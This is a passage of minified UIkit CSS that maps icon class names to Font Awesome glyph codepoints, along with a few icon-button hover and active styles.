#fff}.uk-icon-button:focus,.uk-icon-button:hover{background-color:#fafafa;color:#444;outline:0;border-color:#d3d3d3}.uk-icon-button:active{background-color:#eee;color:#444}.uk-icon-glass:before{content:"\f000"}.uk-icon-music:before{content:"\f001"}.uk-icon-search:before{content:"\f002"}.uk-icon-envelope-o:before{content:"\f003"}.uk-icon-heart:before{content:"\f004"}.uk-icon-star:before{content:"\f005"}.uk-icon-star-o:before{content:"\f006"}.uk-icon-user:before{content:"\f007"}.uk-icon-film:before{content:"\f008"}.uk-icon-th-large:before{content:"\f009"}.uk-icon-th:before{content:"\f00a"}.uk-icon-th-list:before{content:"\f00b"}.uk-icon-check:before{content:"\f00c"}.uk-icon-close:before,.uk-icon-remove:before,.uk-icon-times:before{content:"\f00d"}.uk-icon-search-plus:before{content:"\f00e"}.uk-icon-search-minus:before{content:"\f010"}.uk-icon-power-off:before{content:"\f011"}.uk-icon-signal:before{content:"\f012"}.uk-icon-cog:before,.uk-icon-gear:before{content:"\f013"}.uk-icon-trash-o:before{content:"\f014"}.uk-icon-home:before{content:"\f015"}.uk-icon-file-o:before{content:"\f016"}.uk-icon-clock-o:before{content:"\f017"}.uk-icon-road:before{content:"\f018"}.uk-icon-download:before{content:"\f019"}.uk-icon-arrow-circle-o-down:before{content:"\f01a"}.uk-icon-arrow-circle-o-up:before{content:"\f01b"}.uk-icon-inbox:before{content:"\f01c"}.uk-icon-play-circle-o:before{content:"\f01d"}.uk-icon-repeat:before,.uk-icon-rotate-right:before{content:"\f01e"}.uk-icon-refresh:before{content:"\f021"}.uk-icon-list-alt:before{content:"\f022"}.uk-icon-lock:before{content:"\f023"}.uk-icon-flag:before{content:"\f024"}.uk-icon-headphones:before{content:"\f025"}.uk-icon-volume-off:before{content:"\f026"}.uk-icon-volume-down:before{content:"\f027"}.uk-icon-volume-up:before{content:"\f028"}.uk-icon-qrcode:before{content:"\f029"}.uk-icon-barcode:before{content:"\f02a"}.uk-icon-tag:before{content:"\f02b"}.uk-icon-tags:before{content:"\f02c"}.uk-icon-book:before{content:"\f02d"}.uk-icon-bookmark:before{content:"\f02e"}.uk-icon-print:before{content:"\f02f"}.uk-icon-camera:before{content:"\f030"}.uk-icon-font:before{content:"\f031"}.uk-icon-bold:before{content:"\f032"}.uk-icon-italic:before{content:"\f033"}.uk-icon-text-height:before{content:"\f034"}.uk-icon-text-width:before{content:"\f035"}.uk-icon-align-left:before{content:"\f036"}.uk-icon-align-center:before{content:"\f037"}.uk-icon-align-right:before{content:"\f038"}.uk-icon-align-justify:before{content:"\f039"}.uk-icon-list:before{content:"\f03a"}.uk-icon-dedent:before,.uk-icon-outdent:before{content:"\f03b"}.uk-icon-indent:before{content:"\f03c"}.uk-icon-video-camera:before{content:"\f03d"}.uk-icon-image:before,.uk-icon-photo:before,.uk-icon-picture-o:before{content:"\f03e"}.uk-icon-pencil:before{content:"\f040"}.uk-icon-map-marker:before{content:"\f041"}.uk-icon-adjust:before{content:"\f042"}.uk-icon-tint:before{content:"\f043"}.uk-icon-edit:before,.uk-icon-pencil-square-o:before{content:"\f044"}.uk-icon-share-square-o:before{content:"\f045"}.uk-icon-check-square-o:before{content:"\f046"}.uk-icon-arrows:before{content:"\f047"}.uk-icon-step-backward:before{content:"\f048"}.uk-icon-fast-backward:before{content:"\f049"}.uk-icon-backward:before{content:"\f04a"}.uk-icon-play:before{content:"\f04b"}.uk-icon-pause:before{content:"\f04c"}.uk-icon-stop:before{content:"\f04d"}.uk-icon-forward:before{content:"\f04e"}.uk-icon-fast-forward:before{content:"\f050"}.uk-icon-step-forward:before{content:"\f051"}.uk-icon-eject:before{content:"\f052"}.uk-icon-chevron-left:before{content:"\f053"}.uk-icon-chevron-right:before{content:"\f054"}.uk-icon-plus-circle:before{content:"\f055"}.uk-icon-minus-circle:before{content:"\f056"}.uk-icon-times-circle:before{content:"\f057"}.uk-icon-check-circle:before{content:"\f058"}.uk-icon-question-circle:before{content:"\f059"}.uk-icon-info-circle:before{content:"\f05a"}.uk-icon-crosshairs:before{content:"\f05b"}.uk-icon-times-circle-o:before{content:"\f05c"}.uk-icon-check-circle-o:before{content:"\f05d"}.uk-icon-ban:before{content:"\f05e"}.uk-icon-arrow-left:before{content:"\f060"}.uk-icon-arrow-right:before{content:"\f061"}.uk-icon-arrow-up:before{content:"\f062"}.uk-icon-arrow-down:before{content:"\f063"}.uk-icon-mail-forward:before,.uk-icon-share:before{content:"\f064"}.uk-icon-expand:before{content:"\f065"}.uk-icon-compress:before{content:"\f066"}.uk-icon-plus:before{content:"\f067"}.uk-icon-minus:before{content:"\f068"}.uk-icon-asterisk:before{content:"\f069"}.uk-icon-exclamation-circle:before{content:"\f06a"}.uk-icon-gift:before{content:"\f06b"}.uk-icon-leaf:before{content:"\f06c"}.uk-icon-fire:before{content:"\f06d"}.uk-icon-eye:before{content:"\f06e"}.uk-icon-eye-slash:before{content:"\f070"}.uk-icon-exclamation-triangle:before,.uk-icon-warning:before{content:"\f071"}.uk-icon-plane:before{content:"\f072"}.uk-icon-calendar:before{content:"\f073"}.uk-icon-random:before{content:"\f074"}.uk-icon-comment:before{content:"\f075"}.uk-icon-magnet:before{content:"\f076"}.uk-icon-chevron-up:before{content:"\f077"}.uk-icon-chevron-down:before{content:"\f078"}.uk-icon-retweet:before{content:"\f079"}.uk-icon-shopping-cart:before{content:"\f07a"}.uk-icon-folder:before{content:"\f07b"}.uk-icon-folder-open:before{content:"\f07c"}.uk-icon-arrows-v:before{content:"\f07d"}.uk-icon-arrows-h:before{content:"\f07e"}.uk-icon-bar-chart-o:before,.uk-icon-bar-chart:before{content:"\f080"}.uk-icon-twitter-square:before{content:"\f081"}.uk-icon-facebook-square:before{content:"\f082"}.uk-icon-camera-retro:before{content:"\f083"}.uk-icon-key:before{content:"\f084"}.uk-icon-cogs:before,.uk-icon-gears:before{content:"\f085"}.uk-icon-comments:before{content:"\f086"}.uk-icon-thumbs-o-up:before{content:"\f087"}.uk-icon-thumbs-o-down:before{content:"\f088"}.uk-icon-star-half:before{content:"\f089"}.uk-icon-heart-o:before{content:"\f08a"}.uk-icon-sign-out:before{content:"\f08b"}.uk-icon-linkedin-square:before{content:"\f08c"}.uk-icon-thumb-tack:before{content:"\f08d"}.uk-icon-external-link:before{content:"\f08e"}.uk-icon-sign-in:before{content:"\f090"}.uk-icon-trophy:before{content:"\f091"}.uk-icon-github-square:before{content:"\f092"}.uk-icon-upload:before{content:"\f093"}.uk-icon-lemon-o:before{content:"\f094"}.uk-icon-phone:before{content:"\f095"}.uk-icon-square-o:before{content:"\f096"}.uk-icon-bookmark-o:before{content:"\f097"}.uk-icon-phone-square:before{content:"\f098"}.uk-icon-twitter:before{content:"\f099"}.uk-icon-facebook-f:before,.uk-icon-facebook:before{content:"\f09a"}.uk-icon-github:before{content:"\f09b"}.uk-icon-unlock:before{content:"\f09c"}.uk-icon-credit-card:before{content:"\f09d"}.uk-icon-rss:before{content:"\f09e"}.uk-icon-hdd-o:before{content:"\f0a0"}.uk-icon-bullhorn:before{content:"\f0a1"}.uk-icon-bell:before{content:"\f0f3"}.uk-icon-certificate:before{content:"\f0a3"}.uk-icon-hand-o-right:before{content:"\f0a4"}.uk-icon-hand-o-left:before{content:"\f0a5"}.uk-icon-hand-o-up:before{content:"\f0a6"}.uk-icon-hand-o-down:before{content:"\f0a7"}.uk-icon-arrow-circle-left:before{content:"\f0a8"}.uk-icon-arrow-circle-right:before{content:"\f0a9"}.uk-icon-arrow-circle-up:before{content:"\f0aa"}.uk-icon-arrow-circle-down:before{content:"\f0ab"}.uk-icon-globe:before{content:"\f0ac"}.uk-icon-wrench:before{content:"\f0ad"}.uk-icon-tasks:before{content:"\f0ae"}.uk-icon-filter:before{content:"\f0b0"}.uk-icon-briefcase:before{content:"\f0b1"}.uk-icon-arrows-alt:before{content:"\f0b2"}.uk-icon-group:before,.uk-icon-users:before{content:"\f0c0"}.uk-icon-chain:before,.uk-icon-link:before{content:"\f0c1"}.uk-icon-cloud:before{content:"\f0c2"}.uk-icon-flask:before{content:"\f0c3"}.uk-icon-cut:before,.uk-icon-scissors:before{content:"\f0c4"}.uk-icon-copy:before,.uk-icon-files-o:before{content:"\f0c5"}.uk-icon-paperclip:before{content:"\f0c6"}.uk-icon-floppy-o:before,.uk-icon-save:before{content:"\f0c7"}.uk-icon-square:before{content:"\f0c8"}.uk-icon-bars:before,.uk-icon-navicon:before,.uk-icon-reorder:before{content:"\f0c9"}.uk-icon-list-ul:before{content:"\f0ca"}.uk-icon-list-ol:before{content:"\f0cb"}.uk-icon-strikethrough:before{content:"\f0cc"}.uk-icon-underline:before{content:"\f0cd"}.uk-icon-table:before{content:"\f0ce"}.uk-icon-magic:before{content:"\f0d0"}.uk-icon-truck:before{content:"\f0d1"}.uk-icon-pinterest:before{content:"\f0d2"}.uk-icon-pinterest-square:before{content:"\f0d3"}.uk-icon-google-plus-square:before{content:"\f0d4"}.uk-icon-google-plus:before{content:"\f0d5"}.uk-icon-money:before{content:"\f0d6"}.uk-icon-caret-down:before{content:"\f0d7"}.uk-icon-caret-up:before{content:"\f0d8"}.uk-icon-caret-left:before{content:"\f0d9"}.uk-icon-caret-right:before{content:"\f0da"}.uk-icon-columns:before{content:"\f0db"}.uk-icon-sort:before,.uk-icon-unsorted:before{content:"\f0dc"}.uk-icon-sort-desc:before,.uk-icon-sort-down:before{content:"\f0dd"}.uk-icon-sort-asc:before,.uk-icon-sort-up:before{content:"\f0de"}.uk-icon-envelope:before{content:"\f0e0"}.uk-icon-linkedin:before{content:"\f0e1"}.uk-icon-rotate-left:before,.uk-icon-undo:before{content:"\f0e2"}.uk-icon-gavel:before,.uk-icon-legal:before{content:"\f0e3"}.uk-icon-dashboard:before,.uk-icon-tachometer:before{content:"\f0e4"}.uk-icon-comment-o:before{content:"\f0e5"}.uk-icon-comments-o:before{content:"\f0e6"}.uk-icon-bolt:before,.uk-icon-flash:before{content:"\f0e7"}.uk-icon-sitemap:before{content:"\f0e8"}.uk-icon-umbrella:before{content:"\f0e9"}.uk-icon-clipboard:before,.uk-icon-paste:before{content:"\f0ea"}.uk-icon-lightbulb-o:before{content:"\f0eb"}.uk-icon-exchange:before{content:"\f0ec"}.uk-icon-cloud-download:before{content:"\f0ed"}.uk-icon-cloud-upload:before{content:"\f0ee"}.uk-icon-user-md:before{content:"\f0f0"}.uk-icon-stethoscope:before{content:"\f0f1"}.uk-icon-suitcase:before{content:"\f0f2"}.uk-icon-bell-o:before{content:"\f0a2"}.uk-icon-coffee:before{content:"\f0f4"}.uk-icon-cutlery:before{content:"\f0f5"}.uk-icon-file-text-o:before{content:"\f0f6"}.uk-icon-building-o:before{content:"\f0f7"}.uk-icon-hospital-o:before{content:"\f0f8"}.uk-icon-ambulance:before{content:"\f0f9"}.uk-icon-medkit:before{content:"\f0fa"}.uk-icon-fighter-jet:before{content:"\f0fb"}.uk-icon-beer:before{content:"\f0fc"}.uk-icon-h-square:before{content:"\f0fd"}.uk-icon-plus-square:before{content:"\f0fe"}.uk-icon-angle-double-left:before{content:"\f100"}.uk-icon-angle-double-right:before{content:"\f101"}.uk-icon-angle-double-up:before{content:"\f102"}.uk-icon-angle-double-down:before{content:"\f103"}.uk-icon-angle-left:before{content:"\f104"}.uk-icon-angle-right:before{content:"\f105"}.uk-icon-angle-up:before{content:"\f106"}.uk-icon-angle-down:before{content:"\f107"}.uk-icon-desktop:before{content:"\f108"}.uk-icon-laptop:before{content:"\f109"}.uk-icon-tablet:before{content:"\f10a"}.uk-icon-mobile-phone:before,.uk-icon-mobile:before{content:"\f10b"}.uk-icon-circle-o:before{content:"\f10c"}.uk-icon-quote-left:before{content:"\f10d"}.uk-icon-quote-right:before{content:"\f10e"}.uk-icon-spinner:before{content:"\f110"}.uk-icon-circle:before{content:"\f111"}.uk-icon-mail-reply:before,.uk-icon-reply:before{content:"\f112"}.uk-icon-github-alt:before{content:"\f113"}.uk-icon-folder-o:before{content:"\f114"}.uk-icon-folder-open-o:before{content:"\f115"}.uk-icon-smile-o:before{content:"\f118"}.uk-icon-frown-o:before{content:"\f119"}.uk-icon-meh-o:before{content:"\f11a"}.uk-icon-gamepad:before{content:"\f11b"}.uk-icon-keyboard-o:before{content:"\f11c"}.uk-icon-flag-o:before{content:"\f11d"}.uk-icon-flag-checkered:before{content:"\f11e"}.uk-icon-terminal:before{content:"\f120"}.uk-icon-code:before{content:"\f121"}.uk-icon-mail-reply-all:before,.uk-icon-reply-all:before{content:"\f122"}.uk-icon-star-half-empty:before,.uk-icon-star-half-full:before,.uk-icon-star-half-o:before{content:"\f123"}.uk-icon-location-arrow:before{content:"\f124"}.uk-icon-crop:before{content:"\f125"}.uk-icon-code-fork:before{content:"\f126"}.uk-icon-chain-broken:before,.uk-icon-unlink:before{content:"\f127"}.uk-icon-question:before{content:"\f128"}.uk-icon-info:before{content:"\f129"}.uk-icon-exclamation:before{content:"\f12a"}.uk-icon-superscript:before{content:"\f12b"}.uk-icon-subscript:before{content:"\f12c"}.uk-icon-eraser:before{content:"\f12d"}.uk-icon-puzzle-piece:before{content:"\f12e"}.uk-icon-microphone:before{content:"\f130"}.uk-icon-microphone-slash:before{content:"\f131"}.uk-icon-shield:before{content:"\f132"}.uk-icon-calendar-o:before{content:"\f133"}.uk-icon-fire-extinguisher:before{content:"\f134"}.uk-icon-rocket:before{content:"\f135"}.uk-icon-maxcdn:before{content:"\f136"}.uk-icon-chevron-circle-left:before{content:"\f137"}.uk-icon-chevron-circle-right:before{content:"\f138"}.uk-icon-chevron-circle-up:before{content:"\f139"}.uk-icon-chevron-circle-down:before{content:"\f13a"}.uk-icon-html5:before{content:"\f13b"}.uk-icon-css3:before{content:"\f13c"}.uk-icon-anchor:before{content:"\f13d"}.uk-icon-unlock-alt:before{content:"\f13e"}.uk-icon-bullseye:before{content:"\f140"}.uk-icon-ellipsis-h:before{content:"\f141"}.uk-icon-ellipsis-v:before{content:"\f142"}.uk-icon-rss-square:before{content:"\f143"}.uk-icon-play-circle:before{content:"\f144"}.uk-icon-ticket:before{content:"\f145"}.uk-icon-minus-square:before{content:"\f146"}.uk-icon-minus-square-o:before{content:"\f147"}.uk-icon-level-up:before{content:"\f148"}.uk-icon-level-down:before{content:"\f149"}.uk-icon-check-square:before{content:"\f14a"}.uk-icon-pencil-square:before{content:"\f14b"}.uk-icon-external-link-square:before{content:"\f14c"}.uk-icon-share-square:before{content:"\f14d"}.uk-icon-compass:before{content:"\f14e"}.uk-icon-caret-square-o-down:before,.uk-icon-toggle-down:before{content:"\f150"}.uk-icon-caret-square-o-up:before,.uk-icon-toggle-up:before{content:"\f151"}.uk-icon-caret-square-o-right:before,.uk-icon-toggle-right:before{content:"\f152"}.uk-icon-eur:before,.uk-icon-euro:before{content:"\f153"}.uk-icon-gbp:before{content:"\f154"}.uk-icon-dollar:before,.uk-icon-usd:before{content:"\f155"}.uk-icon-inr:before,.uk-icon-rupee:before{content:"\f156"}.uk-icon-cny:before,.uk-icon-jpy:before,.uk-icon-rmb:before,.uk-icon-yen:before{content:"\f157"}.uk-icon-rouble:before,.uk-icon-rub:before,.uk-icon-ruble:before{content:"\f158"}.uk-icon-krw:before,.uk-icon-won:before{content:"\f159"}.uk-icon-bitcoin:before,.uk-icon-btc:before{content:"\f15a"}.uk-icon-file:before{content:"\f15b"}.uk-icon-file-text:before{content:"\f15c"}.uk-icon-sort-alpha-asc:before{content:"\f15d"}.uk-icon-sort-alpha-desc:before{content:"\f15e"}.uk-icon-sort-amount-asc:before{content:"\f160"}.uk-icon-sort-amount-desc:before{content:"\f161"}.uk-icon-sort-numeric-asc:before{content:"\f162"}.uk-icon-sort-numeric-desc:before{content:"\f163"}.uk-icon-thumbs-up:before{content:"\f164"}.uk-icon-thumbs-down:before{content:"\f165"}.uk-icon-youtube-square:before{content:"\f166"}.uk-icon-youtube:before{content:"\f167"}.uk-icon-xing:before{content:"\f168"}.uk-icon-xing-square:before{content:"\f169"}.uk-icon-youtube-play:before{content:"\f16a"}.uk-icon-dropbox:before{content:"\f16b"}.uk-icon-stack-overflow:before{content:"\f16c"}.uk-icon-instagram:before{content:"\f16d"}.uk-icon-flickr:before{content:"\f16e"}.uk-icon-adn:before{content:"\f170"}.uk-icon-bitbucket:before{content:"\f171"}.uk-icon-bitbucket-square:before{content:"\f172"}.uk-icon-tumblr:before{content:"\f173"}.uk-icon-tumblr-square:before{content:"\f174"}.uk-icon-long-arrow-down:before{content:"\f175"}.uk-icon-long-arrow-up:before{content:"\f176"}.uk-icon-long-arrow-left:before{content:"\f177"}.uk-icon-long-arrow-right:before{content:"\f178"}.uk-icon-apple:before{content:"\f179"}.uk-icon-windows:before{content:"\f17a"}.uk-icon-android:before{content:"\f17b"}.uk-icon-linux:before{content:"\f17c"}.uk-icon-dribbble:before{content:"\f17d"}.uk-icon-skype:before{content:"\f17e"}.uk-icon-foursquare:before{content:"\f180"}.uk-icon-trello:before{content:"\f181"}.uk-icon-female:before{content:"\f182"}.uk-icon-male:before{content:"\f183"}.uk-icon-gittip:before,.uk-icon-gratipay:before{content:"\f184"}.uk-icon-sun-o:before{content:"\f185"}.uk-icon-moon-o:before{content:"\f186"}.uk-icon-archive:before{content:"\f187"}.uk-icon-bug:before{content:"\f188"}.uk-icon-vk:before{content:"\f189"}.uk-icon-weibo:before{content:"\f18a"}.uk-icon-renren:before{content:"\f18b"}.uk-icon-pagelines:before{content:"\f18c"}.uk-icon-stack-exchange:before{content:"\f18d"}.uk-icon-arrow-circle-o-right:before{content:"\f18e"}.uk-icon-arrow-circle-o-left:before{content:"\f190"}.uk-icon-caret-square-o-left:before,.uk-icon-toggle-left:before{content:"\f191"}.uk-icon-dot-circle-o:before{content:"\f192"}.uk-icon-wheelchair:before{content:"\f193"}.uk-icon-vimeo-square:before{content:"\f194"}.uk-icon-try:before,.uk-icon-turkish-lira:before{content:"\f195"}.uk-icon-plus-square-o:before{content:"\f196"}.uk-icon-space-shuttle:before{content:"\f197"}.uk-icon-slack:before{content:"\f198"}.uk-icon-envelope-square:before{content:"\f199"}.uk-icon-wordpress:before{content:"\f19a"}.uk-icon-openid:before{content:"\f19b"}.uk-icon-bank:before,.uk-icon-institution:before,.uk-icon-university:before{content:"\f19c"}.uk-icon-graduation-cap:before,.uk-icon-mortar-board:before{content:"\f19d"}.uk-icon-yahoo:before{content:"\f19e"}.uk-icon-google:before{content:"\f1a0"}.uk-icon-reddit:before{content:"\f1a1"}.uk-icon-reddit-square:before{content:"\f1a2"}.uk-icon-stumbleupon-circle:before{content:"\f1a3"}.uk-icon-stumbleupon:before{content:"\f1a4"}.uk-icon-delicious:before{content:"\f1a5"}.uk-icon-digg:before{content:"\f1a6"}.uk-icon-pied-piper:before{content:"\f1a7"}.uk-icon-pied-piper-alt:before{content:"\f1a8"}.uk-icon-drupal:before{content:"\f1a9"}.uk-icon-joomla:before{content:"\f1aa"}.uk-icon-language:before{content:"\f1ab"}.uk-icon-fax:before{content:"\f1ac"}.uk-icon-building:before{content:"\f1ad"}.uk-icon-child:before{content:"\f1ae"}.uk-icon-paw:before{content:"\f1b0"}.uk-icon-spoon:before{content:"\f1b1"}.uk-icon-cube:before{content:"\f1b2"}.uk-icon-cubes:before{content:"\f1b3"}.uk-icon-behance:before{content:"\f1b4"}.uk-icon-behance-square:before{content:"\f1b5"}.uk-icon-steam:before{content:"\f1b6"}.uk-icon-steam-square:before{content:"\f1b7"}.uk-icon-recycle:before{content:"\f1b8"}.uk-icon-automobile:before,.uk-icon-car:before{content:"\f1b9"}.uk-icon-cab:before,.uk-icon-taxi:before{content:"\f1ba"}.uk-icon-tree:before{content:"\f1bb"}.uk-icon-spotify:before{content:"\f1bc"}.uk-icon-deviantart:before{content:"\f1bd"}.uk-icon-soundcloud:before{content:"\f1be"}.uk-icon-database:before{content:"\f1c0"}.uk-icon-file-pdf-o:before{content:"\f1c1"}.uk-icon-file-word-o:before{content:"\f1c2"}.uk-icon-file-excel-o:before{content:"\f1c3"}.uk-icon-file-powerpoint-o:before{content:"\f1c4"}.uk-icon-file-image-o:before,.uk-icon-file-photo-o:before,.uk-icon-file-picture-o:before{content:"\f1c5"}.uk-icon-file-archive-o:before,.uk-icon-file-zip-o:before{content:"\f1c6"}.uk-icon-file-audio-o:before,.uk-icon-file-sound-o:before{content:"\f1c7"}.uk-icon-file-movie-o:before,.uk-icon-file-video-o:before{content:"\f1c8"}.uk-icon-file-code-o:before{content:"\f1c9"}.uk-icon-vine:before{content:"\f1ca"}.uk-icon-codepen:before{content:"\f1cb"}.uk-icon-jsfiddle:before{content:"\f1cc"}.uk-icon-life-bouy:before,.uk-icon-life-buoy:before,.uk-icon-life-ring:before,.uk-icon-life-saver:before,.uk-icon-support:before{content:"\f1cd"}.uk-icon-circle-o-notch:before{content:"\f1ce"}.uk-icon-ra:before,.uk-icon-rebel:before{content:"\f1d0"}.uk-icon-empire:before,.uk-icon-ge:before{content:"\f1d1"}.uk-icon-git-square:before{content:"\f1d2"}.uk-icon-git:before{content:"\f1d3"}.uk-icon-hacker-news:before{content:"\f1d4"}.uk-icon-tencent-weibo:before{content:"\f1d5"}.uk-icon-qq:before{content:"\f1d6"}.uk-icon-wechat:before,.uk-icon-weixin:before{content:"\f1d7"}.uk-icon-paper-plane:before,.uk-icon-send:before{content:"\f1d8"}.uk-icon-paper-plane-o:before,.uk-icon-send-o:before{content:"\f1d9"}.uk-icon-history:before{content:"\f1da"}.uk-icon-circle-thin:before,.uk-icon-genderless:before{content:"\f1db"}.uk-icon-header:before{content:"\f1dc"}.uk-icon-paragraph:before{content:"\f1dd"}.uk-icon-sliders:before{content:"\f1de"}.uk-icon-share-alt:before{content:"\f1e0"}.uk-icon-share-alt-square:before{content:"\f1e1"}.uk-icon-bomb:before{content:"\f1e2"}.uk-icon-futbol-o:before,.uk-icon-soccer-ball-o:before{content:"\f1e3"}.uk-icon-tty:before{content:"\f1e4"}.uk-icon-binoculars:before{content:"\f1e5"}.uk-icon-plug:before{content:"\f1e6"}.uk-icon-slideshare:before{content:"\f1e7"}.uk-icon-twitch:before{content:"\f1e8"}.uk-icon-yelp:before{content:"\f1e9"}.uk-icon-newspaper-o:before{content:"\f1ea"}.uk-icon-wifi:before{content:"\f1eb"}.uk-icon-calculator:before{content:"\f1ec"}.uk-icon-paypal:before{content:"\f1ed"}.uk-icon-google-wallet:before{content:"\f1ee"}.uk-icon-cc-visa:before{content:"\f1f0"}.uk-icon-cc-mastercard:before{content:"\f1f1"}.uk-icon-cc-discover:before{content:"\f1f2"}.uk-icon-cc-amex:before{content:"\f1f3"}.uk-icon-cc-paypal:before{content:"\f1f4"}.uk-icon-cc-stripe:before{content:"\f1f5"}.uk-icon-bell-slash:before{content:"\f1f6"}.uk-icon-bell-slash-o:before{content:"\f1f7"}.uk-icon-trash:before{content:"\f1f8"}.uk-icon-copyright:before{content:"\f1f9"}.uk-icon-at:before{content:"\f1fa"}.uk-icon-eyedropper:before{content:"\f1fb"}.uk-icon-paint-brush:before{content:"\f1fc"}.uk-icon-birthday-cake:before{content:"\f1fd"}.uk-icon-area-chart:before{content:"\f1fe"}.uk-icon-pie-chart:before{content:"\f200"}.uk-icon-line-chart:before{content:"\f201"}.uk-icon-lastfm:before{content:"\f202"}.uk-icon-lastfm-square:before{content:"\f203"}.uk-icon-toggle-off:before{content:"\f204"}.uk-icon-toggle-on:before{content:"\f205"}.uk-icon-bicycle:before{content:"\f206"}.uk-icon-bus:before{content:"\f207"}.uk-icon-ioxhost:before{content:"\f208"}.uk-icon-angellist:before{content:"\f209"}.uk-icon-cc:before{content:"\f20a"}.uk-icon-ils:before,.uk-icon-shekel:before,.uk-icon-sheqel:before{content:"\f20b"}.uk-icon-meanpath:before{content:"\f20c"}.uk-icon-buysellads:before{content:"\f20d"}.uk-icon-connectdevelop:before{content:"\f20e"}.uk-icon-dashcube:before{content:"\f210"}.uk-icon-forumbee:before{content:"\f211"}.uk-icon-leanpub:before{content:"\f212"}.uk-icon-sellsy:before{content:"\f213"}.uk-icon-shirtsinbulk:before{content:"\f214"}.uk-icon-simplybuilt:before{content:"\f215"}.uk-icon-skyatlas:before{content:"\f216"}.uk-icon-cart-plus:before{content:"\f217"}.uk-icon-cart-arrow-down:before{content:"\f218"}.uk-icon-diamond:before{content:"\f219"}.uk-icon-ship:before{content:"\f21a"}.uk-icon-user-secret:before{content:"\f21b"}.uk-icon-motorcycle:before{content:"\f21c"}.uk-icon-street-view:before{content:"\f21d"}.uk-icon-heartbeat:before{content:"\f21e"}.uk-icon-venus:before{content:"\f221"}.uk-icon-mars:before{content:"\f222"}.uk-icon-mercury:before{content:"\f223"}.uk-icon-transgender:before{content:"\f224"}.uk-icon-transgender-alt:before{content:"\f225"}.uk-icon-venus-double:before{content:"\f226"}.uk-icon-mars-double:before{content:"\f227"}.uk-icon-venus-mars:before{content:"\f228"}.uk-icon-mars-stroke:before{content:"\f229"}.uk-icon-mars-stroke-v:before{content:"\f22a"}.uk-icon-mars-stroke-h:before{content:"\f22b"}.uk-icon-neuter:before{content:"\f22c"}.uk-icon-facebook-official:before{content:"\f230"}.uk-icon-pinterest-p:before{content:"\f231"}.uk-icon-whatsapp:before{content:"\f232"}.uk-icon-server:before{content:"\f233"}.uk-icon-user-plus:before{content:"\f234"}.uk-icon-user-times:before{content:"\f235"}.uk-icon-bed:before,.uk-icon-hotel:before{content:"\f236"}.uk-icon-viacoin:before{content:"\f237"}.uk-icon-train:before{content:"\f238"}.uk-icon-subway:before{content:"\f239"}.uk-icon-medium-logo:before{content:"\f23a"}.uk-icon-500px:before{content:"\f26e"}.uk-icon-amazon:before{content:"\f270"}.uk-icon-balance-scale:before{content:"\f24e"}.uk-icon-battery-0:before,.uk-icon-battery-empty:before{content:"\f244"}.uk-icon-battery-1:before,.uk-icon-battery-quarter:before{content:"\f243"}.uk-icon-battery-2:before,.uk-icon-battery-half:before{content:"\f242"}.uk-icon-battery-3:before,.uk-icon-battery-three-quarters:before{content:"\f241"}.uk-icon-battery-4:before,.uk-icon-battery-full:before{content:"\f240"}.uk-icon-black-tie:before{content:"\f27e"}.uk-icon-calendar-check-o:before{content:"\f274"}.uk-icon-calendar-minus-o:before{content:"\f272"}.uk-icon-calendar-plus-o:before{content:"\f271"}.uk-icon-calendar-times-o:before{content:"\f273"}.uk-icon-cc-diners-club:before{content:"\f24c"}.uk-icon-cc-jcb:before{content:"\f24b"}.uk-icon-chrome:before{content:"\f268"}.uk-icon-clone:before{content:"\f24d"}.uk-icon-commenting:before{content:"\f27a"}.uk-icon-commenting-o:before{content:"\f27b"}.uk-icon-contao:before{content:"\f26d"}.uk-icon-creative-commons:before{content:"\f25e"}.uk-icon-expeditedssl:before{content:"\f23e"}.uk-icon-firefox:before{content:"\f269"}.uk-icon-fonticons:before{content:"\f280"}.uk-icon-get-pocket:before{content:"\f265"}.uk-icon-gg:before{content:"\f260"}.uk-icon-gg-circle:before{content:"\f261"}.uk-icon-hand-lizard-o:before{content:"\f258"}.uk-icon-hand-paper-o:before,.uk-icon-hand-stop-o:before{content:"\f256"}.uk-icon-hand-peace-o:before{content:"\f25b"}.uk-icon-hand-pointer-o:before{content:"\f25a"}.uk-icon-hand-grab-o:before,.uk-icon-hand-rock-o:before{content:"\f255"}.uk-icon-hand-scissors-o:before{content:"\f257"}.uk-icon-hand-spock-o:before{content:"\f259"}.uk-icon-hourglass:before{content:"\f254"}.uk-icon-hourglass-o:before{content:"\f250"}.uk-icon-hourglass-1:before,.uk-icon-hourglass-start:before{content:"\f251"}.uk-icon-hourglass-2:before,.uk-icon-hourglass-half:before{content:"\f252"}.uk-icon-hourglass-3:before,.uk-icon-hourglass-end:before{content:"\f253"}.uk-icon-houzz:before{content:"\f27c"}.uk-icon-i-cursor:before{content:"\f246"}.uk-icon-industry:before{content:"\f275"}.uk-icon-internet-explorer:before{content:"\f26b"}.uk-icon-map:before{content:"\f279"}.uk-icon-map-o:before{content:"\f278"}.uk-icon-map-pin:before{content:"\f276"}.uk-icon-map-signs:before{content:"\f277"}.uk-icon-mouse-pointer:before{content:"\f245"}.uk-icon-object-group:before{content:"\f247"}.uk-icon-object-ungroup:before{content:"\f248"}.uk-icon-odnoklassniki:before{content:"\f263"}.uk-icon-odnoklassniki-square:before{content:"\f264"}.uk-icon-opencart:before{content:"\f23d"}.uk-icon-opera:before{content:"\f26a"}.uk-icon-optin-monster:before{content:"\f23c"}.uk-icon-registered:before{content:"\f25d"}.uk-icon-safari:before{content:"\f267"}.uk-icon-sticky-note:before{content:"\f249"}.uk-icon-sticky-note-o:before{content:"\f24a"}.uk-icon-television:before,.uk-icon-tv:before{content:"\f26c"}.uk-icon-trademark:before{content:"\f25c"}.uk-icon-tripadvisor:before{content:"\f262"}.uk-icon-vimeo:before{content:"\f27d"}.uk-icon-wikipedia-w:before{content:"\f266"}.uk-icon-y-combinator:before,.uk-icon-yc:before{content:"\f23b"}.uk-icon-y-combinator-square:before,.uk-icon-yc-square:before{content:"\f1d4"}.uk-icon-bluetooth:before{content:"\f293"}.uk-icon-bluetooth-b:before{content:"\f294"}.uk-icon-codiepie:before{content:"\f284"}.uk-icon-credit-card-alt:before{content:"\f283"}.uk-icon-edge:before{content:"\f282"}.uk-icon-fort-awesome:before{content:"\f286"}.uk-icon-hashtag:before{content:"\f292"}.uk-icon-mixcloud:before{content:"\f289"}.uk-icon-modx:before{content:"\f285"}.uk-icon-pause-circle:before{content:"\f28b"}.uk-icon-pause-circle-o:before{content:"\f28c"}.uk-icon-percent:before{content:"\f295"}.uk-icon-product-hunt:before{content:"\f288"}.uk-icon-reddit-alien:before{content:"\f281"}.uk-icon-scribd:before{content:"\f28a"}.uk-icon-shopping-bag:before{content:"\f290"